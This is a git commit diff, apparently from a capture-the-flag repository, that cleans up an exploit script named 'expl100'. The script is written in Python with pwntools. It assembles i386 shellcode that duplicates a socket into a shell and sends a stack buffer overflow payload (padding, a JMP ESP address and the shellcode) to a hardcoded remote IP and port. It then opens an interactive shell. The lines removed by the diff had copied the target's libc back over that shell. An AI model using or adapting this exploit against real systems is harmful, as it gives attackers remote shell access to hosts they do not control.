Cleanup expl100

This commit is contained in:
q3k 2015-01-11 13:58:31 +01:00
parent 4f4af8e3d1
commit 14a3f0ed6a

View file

@ -1,7 +1,5 @@
import pwn
import sys
from pwn import asm
import socket
shellcode = pwn.asm("""
mov eax, esp
@ -11,21 +9,12 @@ mov ebp, dword ptr [eax+6]
""" + pwn.shellcraft.i386.linux.dupsh('ebp'))
assert "\x00" not in shellcode
assert len(shellcode) <= 118
JMP_ESP = 0x080488b0
s = pwn.remote('54.163.248.69', 9000)
s.send('echo ' + 'a' * 118 + pwn.p32(JMP_ESP) + shellcode + '\n')
print s.recv(1024)
#s.interactive()
s.send("cat /lib/i386-linux-gnu/libc.so.6\n\n")
f = open('libc.so', 'w')
while True:
d = s.recv(1024)
if len(d) == 0:
break
f.write(d)
f.flush()
sys.stdout.write('.')
sys.stdout.flush()
s.interactive()